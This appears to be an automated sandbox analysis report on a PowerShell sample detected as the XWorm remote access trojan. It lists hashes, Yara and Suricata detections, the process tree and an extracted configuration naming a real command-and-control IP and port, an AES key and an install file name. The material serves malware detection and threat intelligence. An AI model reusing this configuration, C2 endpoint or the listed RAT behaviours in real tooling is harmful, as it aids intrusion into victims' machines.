Windows Analysis Report
rZqmN4mRco.ps1

Overview

General Information

Sample name: rZqmN4mRco.ps1 (renamed because original name is a hash value)
Original sample name: 802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed.ps1
Analysis ID: 1601199
MD5: c243c751841d3cce8b6d14ecd48703b7
SHA1: 145913260586b946f0e858635c6255b073531b71
SHA256: 802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed
Tags: 176-113-115-225, booking, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Malware Callback Communication
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart (axis labels): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
  • System is w10x64
  • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{
  "C2 url": [
    "176.113.115.225"
  ],
  "Port": 4444,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe"
}
Yara matches in memory dumps (Source; Rule; Description; Author; Strings):

Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0xd038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd0d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd1ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xccaa:$cnc4: POST / HTTP/1.1
Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0xb938:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb9d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbaea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb5aa:$cnc4: POST / HTTP/1.1
Source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings):

Source: 1.2.powershell.exe.19b0aa80e98.2.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 1.2.powershell.exe.19b0aa80e98.2.unpack; Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x7c92:$str01: $VB$Local_Port
  • 0x7cfe:$str02: $VB$Local_Host
  • 0x65ee:$str03: get_Jpeg
  • 0x6b90:$str04: get_ServicePack
  • 0x89be:$str05: Select * from AntivirusProduct
  • 0x90fc:$str06: PCRestart
  • 0x9110:$str07: shutdown.exe /f /r /t 0
  • 0x91c2:$str08: StopReport
  • 0x9198:$str09: StopDDos
  • 0x928e:$str10: sendPlugin
  • 0x930e:$str11: OfflineKeylogger Not Enabled
  • 0x9466:$str12: -ExecutionPolicy Bypass -File "
  • 0x9a8f:$str13: Content-length: 5235
Source: 1.2.powershell.exe.19b0aa80e98.2.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x9d38:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9dd5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9eea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x99aa:$cnc4: POST / HTTP/1.1
Source: 3.2.RegSvcs.exe.400000.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 3.2.RegSvcs.exe.400000.0.unpack; Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x9a92:$str01: $VB$Local_Port
  • 0x9afe:$str02: $VB$Local_Host
  • 0x83ee:$str03: get_Jpeg
  • 0x8990:$str04: get_ServicePack
  • 0xa7be:$str05: Select * from AntivirusProduct
  • 0xaefc:$str06: PCRestart
  • 0xaf10:$str07: shutdown.exe /f /r /t 0
  • 0xafc2:$str08: StopReport
  • 0xaf98:$str09: StopDDos
  • 0xb08e:$str10: sendPlugin
  • 0xb10e:$str11: OfflineKeylogger Not Enabled
  • 0xb266:$str12: -ExecutionPolicy Bypass -File "
  • 0xb88f:$str13: Content-length: 5235

System Summary

Sigma rule matches:
Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 176.113.115.225, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7948, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", ProcessId: 7728, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", ProcessId: 7728, ProcessName: powershell.exe
Suricata alerts (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol):
SID: 2852870, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 176.113.115.225, Source Port: 4444, Destination IP: 192.168.2.8, Destination Port: 49705, Protocol: TCP (same for every row); Timestamps:
2025-01-28T12:23:27.023169+0100
2025-01-28T12:23:35.884149+0100
2025-01-28T12:23:39.893947+0100
2025-01-28T12:23:52.769091+0100
2025-01-28T12:24:05.664555+0100
2025-01-28T12:24:05.886218+0100
2025-01-28T12:24:18.527432+0100
2025-01-28T12:24:21.628137+0100
2025-01-28T12:24:21.750649+0100
2025-01-28T12:24:26.972360+0100
2025-01-28T12:24:27.373556+0100
2025-01-28T12:24:27.494814+0100
2025-01-28T12:24:27.615955+0100
2025-01-28T12:24:35.882836+0100
2025-01-28T12:24:37.643539+0100
2025-01-28T12:24:37.765523+0100
2025-01-28T12:24:37.909469+0100
2025-01-28T12:24:42.925238+0100
2025-01-28T12:24:43.047982+0100
2025-01-28T12:24:53.035067+0100
2025-01-28T12:24:53.157468+0100
2025-01-28T12:24:53.562775+0100
2025-01-28T12:24:53.738401+0100
2025-01-28T12:25:03.414632+0100
2025-01-28T12:25:03.422945+0100
2025-01-28T12:25:05.899412+0100
2025-01-28T12:25:10.488112+0100
2025-01-28T12:25:13.511614+0100
2025-01-28T12:25:14.415618+0100
2025-01-28T12:25:27.367080+0100
2025-01-28T12:25:34.379297+0100
2025-01-28T12:25:35.909409+0100
2025-01-28T12:25:41.599608+0100
2025-01-28T12:25:43.064967+0100
2025-01-28T12:25:45.661132+0100
2025-01-28T12:25:58.523391+0100
2025-01-28T12:26:01.175747+0100
2025-01-28T12:26:02.217210+0100
2025-01-28T12:26:02.217544+0100
2025-01-28T12:26:02.217814+0100
2025-01-28T12:26:02.431071+0100
2025-01-28T12:26:05.920555+0100
2025-01-28T12:26:12.409871+0100
2025-01-28T12:26:13.238106+0100
2025-01-28T12:26:18.066460+0100
2025-01-28T12:26:25.113128+0100
2025-01-28T12:26:27.815842+0100
2025-01-28T12:26:27.988143+0100
2025-01-28T12:26:28.110626+0100
2025-01-28T12:26:28.408775+0100
2025-01-28T12:26:28.676942+0100
2025-01-28T12:26:29.097432+0100
2025-01-28T12:26:31.488902+0100
2025-01-28T12:26:34.035130+0100
2025-01-28T12:26:35.928828+0100
2025-01-28T12:26:38.413379+0100
2025-01-28T12:26:39.128239+0100
2025-01-28T12:26:39.335986+0100
2025-01-28T12:26:40.317484+0100
2025-01-28T12:26:49.521752+0100
2025-01-28T12:26:49.642322+0100
2025-01-28T12:26:49.765402+0100
2025-01-28T12:26:49.884171+0100
2025-01-28T12:26:50.340712+0100
2025-01-28T12:26:55.301255+0100
2025-01-28T12:26:55.684756+0100
2025-01-28T12:27:01.425651+0100
2025-01-28T12:27:05.948767+0100
2025-01-28T12:27:06.769231+0100
2025-01-28T12:27:06.891752+0100
2025-01-28T12:27:14.425804+0100
2025-01-28T12:27:15.926110+0100
Suricata alerts (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol):
SID: 2852923, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.8, Source Port: 49705, Destination IP: 176.113.115.225, Destination Port: 4444, Protocol: TCP (same for every row); Timestamps:
2025-01-28T12:23:27.307565+0100
2025-01-28T12:23:39.909678+0100
2025-01-28T12:23:52.773427+0100
2025-01-28T12:24:05.666581+0100
2025-01-28T12:24:18.529867+0100
2025-01-28T12:24:21.634672+0100
2025-01-28T12:24:21.758652+0100
2025-01-28T12:24:26.976678+0100
2025-01-28T12:24:27.375983+0100
2025-01-28T12:24:27.497081+0100
2025-01-28T12:24:27.619295+0100
2025-01-28T12:24:37.648693+0100
2025-01-28T12:24:37.767213+0100
2025-01-28T12:24:37.911386+0100
2025-01-28T12:24:42.927266+0100
2025-01-28T12:24:43.050094+0100
2025-01-28T12:24:53.040631+0100
2025-01-28T12:24:53.159267+0100
2025-01-28T12:24:53.584201+0100
2025-01-28T12:24:53.897168+0100
2025-01-28T12:25:03.416900+0100
2025-01-28T12:25:03.424967+0100
2025-01-28T12:25:10.516865+0100
2025-01-28T12:25:13.513922+0100
2025-01-28T12:25:14.418720+0100
2025-01-28T12:25:27.369454+0100
2025-01-28T12:25:34.383872+0100
2025-01-28T12:25:41.602344+0100
2025-01-28T12:25:43.067711+0100
2025-01-28T12:25:45.663000+0100
2025-01-28T12:25:58.525437+0100
2025-01-28T12:26:01.177247+0100
2025-01-28T12:26:02.219550+0100
2025-01-28T12:26:02.433315+0100
2025-01-28T12:26:12.412310+0100
2025-01-28T12:26:13.239839+0100
2025-01-28T12:26:18.411580+0100
2025-01-28T12:26:25.122064+0100
2025-01-28T12:26:27.819607+0100
2025-01-28T12:26:27.991592+0100
2025-01-28T12:26:28.112229+0100
2025-01-28T12:26:28.411007+0100
2025-01-28T12:26:28.682056+0100
2025-01-28T12:26:29.099404+0100
2025-01-28T12:26:31.490696+0100
2025-01-28T12:26:34.039595+0100
2025-01-28T12:26:38.414881+0100
2025-01-28T12:26:39.135435+0100
2025-01-28T12:26:39.339163+0100
2025-01-28T12:26:40.319218+0100
2025-01-28T12:26:49.523712+0100
2025-01-28T12:26:49.648494+0100
2025-01-28T12:26:49.767663+0100
2025-01-28T12:26:49.887455+0100
2025-01-28T12:26:50.343534+0100
2025-01-28T12:26:55.303233+0100
2025-01-28T12:26:55.686427+0100
2025-01-28T12:27:01.427397+0100
2025-01-28T12:27:06.770870+0100
2025-01-28T12:27:06.894142+0100
2025-01-28T12:27:14.427797+0100
2025-01-28T12:27:15.927184+0100
Suricata alerts (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol):
Timestamp: 2025-01-28T12:23:35.884149+0100, SID: 2858801, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 176.113.115.225, Source Port: 4444, Destination IP: 192.168.2.8, Destination Port: 49705, Protocol: TCP
Suricata alerts (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol):
Timestamp: 2025-01-28T12:25:27.070180+0100, SID: 2858799, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.8, Source Port: 49705, Destination IP: 176.113.115.225, Destination Port: 4444, Protocol: TCP

AV Detection

Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.225"], "Port": 4444, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: rZqmN4mRco.ps1; Virustotal: Detection: 31%
Source: rZqmN4mRco.ps1; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: 176.113.115.225
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: 4444
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: P0WER
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: <Xwormmm>
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: XWorm
Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack; String decryptor: USB.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.225:4444 -> 192.168.2.8:49705
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.225:4444 -> 192.168.2.8:49705
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Malware configuration extractorURLs: 176.113.115.225
            Source: global trafficTCP traffic: 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0AB0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            System Summary

            barindex
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B461083
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01496340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0149C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0149B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_014984B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01495A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01495728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01490FA0
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 75nEg0zZR0dHe.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ocdWY4uta2L6F.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 75nEg0zZR0dHe.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ocdWY4uta2L6F.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
